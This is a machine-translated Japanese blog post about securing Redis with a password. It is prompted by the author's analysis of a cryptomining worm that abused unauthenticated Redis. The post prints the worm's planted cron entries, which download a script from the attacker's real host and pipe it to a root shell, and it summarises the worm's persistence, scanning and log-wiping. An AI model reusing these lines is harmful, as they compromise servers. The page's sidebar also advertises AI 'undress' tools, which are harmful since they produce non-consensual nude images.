Redis でパスワードを設定する必要がある理由は何ですか?
redis でパスワードを設定する必要があるのはなぜですか?
イントラネット環境ではパスワードを設定する必要はありませんが、個人サーバーやオンラインのパブリックネットワークサーバーではパスワードを設定する必要があります。
昨日、redis で minio のイベント通知を確認したところ、redis キーを確認したところ、いくつか異常なキーが見つかりました。バックアップ1、バックアップ2、バックアップ3。それから私はそれがマイニングウイルスだと推測しました。
以下に示すように: このようにして、スケジュールされたタスクとスクリプトがマシンに挿入され、init.sh スクリプトの実行が開始されます。 init.shスクリプト?
en2an.top/cleanfda/in…
このキーの値を確認すると、アドレスが要求されることがわかります。キーを開いて、この init.sh が何であるかを見てみましょう。
以下にスクリプトファイルを示します。
これには非常に多くのスクリプトがあります。selinux をオフにし、他の人のマイニング プロセスを強制終了し、CPU を大量に消費するプロセスを強制終了します。自分の場合は、システム コマンドの破棄、独自の downloads() 関数の作成、ロックされたタスクのロック解除と追加、マイニング テクノロジ タスクの追加、SSH パスワードなしのログインの設定、マイニング マシン マイニング プログラムのダウンロードと実行、ファイアウォールのオフ、ログ、既知の感染をクリアする パスワードのないマシンの場合は、is.sh をダウンロードして実行します。
is.sh スクリプトの内容は何ですか?
en2an.top/cleanfda/is…
下の図に示すように、上記の init.sh は is.sh スクリプトをダウンロードします。
このスクリプトの動作を見てみましょう。
下の図に示すように、このスクリプトには非常に多くのコンテンツが含まれています。 Masscan スキャナーをダウンロードし、pnscan スキャナーをダウンロードし、redis をインストールして Redis の不正アクセスの脆弱性を作成し、rs.sh を実行します。
rs.sh スクリプトの内容は何ですか?
en2an.top/cleanfda/rs…
このスクリプトの内容は、上記のリンクから表示できます。
ポート 6379 を開き、redis を使用して承認なしでスケジュールされたタスクを自動的に書き込み、pnscan を使用してセグメント b の IP 6379 ポートをスキャンし、masscan を使用してポートをスキャンします。
Redis のパスワードを設定するにはどうすればよいですか?
上記の分析を通じて、このウイルスは基本的にマイニング スクリプトを Redis に挿入することによって機能すると結論付けることができます。 Redis にパスワードが設定されておらず、公共のインターネット上に公開されている場合は、注意してください。
次の 2 つの方法で、redis のパスワードを設定できます。
方法 1: redis.conf 構成ファイルを変更する
この方法では構成ファイルを変更するため、有効にするには Redis を再起動する必要があることに注意してください。
redis.conf ファイルを見つけます。
Windows は次の図に示されています
このファイルを編集し、requirepass を見つけ、コメントを解除し、指定された値を設定し、redis を再起動して取得します。効果。
インストール方法は人によって異なると思うので、docker経由でインストールしてマッピングしました。ここでは説明しませんが、Linux にインストールされている redis ディレクトリを見つけて、設定ファイル redis.conf を探します Windows と同じ操作です 設定後、再起動すればOKです
方法 2
Redis に接続し、指示に従ってパスワードを設定します。
この方法は比較的簡単で、再起動しなくても有効になります。
次のコマンドは、パスワードを 123456 に設定することを意味します。パブリック ネットワークでは、これほど簡単にパスワードを設定すべきではありません。
backup1 "\n\n\n*/2 * * * * root cd1 -fsSL http://en2an.top/cleanfda/init.sh | sh\n\n" backup2 "\n\n\n*/3 * * * * root wget -q -O- http://en2an.top/cleanfda/init.sh | sh\n\n" backup3 "\n\n\n*/4 * * * * root curl -fsSL http://en2an.top/cleanfda/init.sh | sh\n\n" backup4 "\n\n\n*/5 * * * * root wd1 -q -O- http://en2an.top/cleanfda/init.sh | sh\n\n"
Redis パスワードを確認してみましょう。
config set requirepass 123456
このようにして、パスワードが正常に設定され、redis クライアントを終了して再度接続すると有効になります。
以上がRedis でパスワードを設定する必要がある理由は何ですか?の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。
ホットAIツール
Undresser.AI Undress
リアルなヌード写真を作成する AI 搭載アプリ
AI Clothes Remover
写真から衣服を削除するオンライン AI ツール。
Undress AI Tool
脱衣画像を無料で
Clothoff.io
AI衣類リムーバー
Video Face Swap
完全無料の AI 顔交換ツールを使用して、あらゆるビデオの顔を簡単に交換できます。
人気の記事
ホットツール
メモ帳++7.3.1
使いやすく無料のコードエディター
SublimeText3 中国語版
中国語版、とても使いやすい
ゼンドスタジオ 13.0.1
強力な PHP 統合開発環境
ドリームウィーバー CS6
ビジュアル Web 開発ツール
SublimeText3 Mac版
神レベルのコード編集ソフト(SublimeText3)
ホットトピック
7678
15
1393
52
1209
24
91
11
Redisクラスターモードの構築方法
Apr 10, 2025 pm 10:15 PM
Redisクラスターモードは、シャードを介してRedisインスタンスを複数のサーバーに展開し、スケーラビリティと可用性を向上させます。構造の手順は次のとおりです。異なるポートで奇妙なRedisインスタンスを作成します。 3つのセンチネルインスタンスを作成し、Redisインスタンスを監視し、フェールオーバーを監視します。 Sentinel構成ファイルを構成し、Redisインスタンス情報とフェールオーバー設定の監視を追加します。 Redisインスタンス構成ファイルを構成し、クラスターモードを有効にし、クラスター情報ファイルパスを指定します。各Redisインスタンスの情報を含むnodes.confファイルを作成します。クラスターを起動し、CREATEコマンドを実行してクラスターを作成し、レプリカの数を指定します。クラスターにログインしてクラスター情報コマンドを実行して、クラスターステータスを確認します。作る
Redisデータをクリアする方法
Apr 10, 2025 pm 10:06 PM
Redisデータをクリアする方法:Flushallコマンドを使用して、すべての重要な値をクリアします。 FlushDBコマンドを使用して、現在選択されているデータベースのキー値をクリアします。 [選択]を使用してデータベースを切り替え、FlushDBを使用して複数のデータベースをクリアします。 DELコマンドを使用して、特定のキーを削除します。 Redis-CLIツールを使用してデータをクリアします。
Redisキューの読み方
Apr 10, 2025 pm 10:12 PM
Redisのキューを読むには、キュー名を取得し、LPOPコマンドを使用して要素を読み、空のキューを処理する必要があります。特定の手順は次のとおりです。キュー名を取得します:「キュー:キュー」などの「キュー:」のプレフィックスで名前を付けます。 LPOPコマンドを使用します。キューのヘッドから要素を排出し、LPOP Queue:My-Queueなどの値を返します。空のキューの処理:キューが空の場合、LPOPはnilを返し、要素を読む前にキューが存在するかどうかを確認できます。
Redisコマンドの使用方法
Apr 10, 2025 pm 08:45 PM
Redis指令を使用するには、次の手順が必要です。Redisクライアントを開きます。コマンド(動詞キー値)を入力します。必要なパラメーターを提供します(指示ごとに異なります)。 Enterを押してコマンドを実行します。 Redisは、操作の結果を示す応答を返します(通常はOKまたは-ERR)。
Redisロックの使用方法
Apr 10, 2025 pm 08:39 PM
Redisを使用して操作をロックするには、setnxコマンドを介してロックを取得し、有効期限を設定するために有効期限コマンドを使用する必要があります。特定の手順は次のとおりです。(1)SETNXコマンドを使用して、キー価値ペアを設定しようとします。 (2)expireコマンドを使用して、ロックの有効期限を設定します。 (3)Delコマンドを使用して、ロックが不要になったときにロックを削除します。
Redisのソースコードを読み取る方法
Apr 10, 2025 pm 08:27 PM
Redisソースコードを理解する最良の方法は、段階的に進むことです。Redisの基本に精通してください。開始点として特定のモジュールまたは機能を選択します。モジュールまたは機能のエントリポイントから始めて、行ごとにコードを表示します。関数コールチェーンを介してコードを表示します。 Redisが使用する基礎となるデータ構造に精通してください。 Redisが使用するアルゴリズムを特定します。
Redisコマンドラインの使用方法
Apr 10, 2025 pm 10:18 PM
Redisコマンドラインツール(Redis-Cli)を使用して、次の手順を使用してRedisを管理および操作します。サーバーに接続し、アドレスとポートを指定します。コマンド名とパラメーターを使用して、コマンドをサーバーに送信します。ヘルプコマンドを使用して、特定のコマンドのヘルプ情報を表示します。 QUITコマンドを使用して、コマンドラインツールを終了します。
Centos RedisでLUAスクリプト実行時間を構成する方法
Apr 14, 2025 pm 02:12 PM
Centosシステムでは、Redis構成ファイルを変更するか、Redisコマンドを使用して悪意のあるスクリプトがあまりにも多くのリソースを消費しないようにすることにより、LUAスクリプトの実行時間を制限できます。方法1:Redis構成ファイルを変更し、Redis構成ファイルを見つけます:Redis構成ファイルは通常/etc/redis/redis.confにあります。構成ファイルの編集:テキストエディター(VIやNANOなど)を使用して構成ファイルを開きます:sudovi/etc/redis/redis.conf luaスクリプト実行時間制限を設定します。
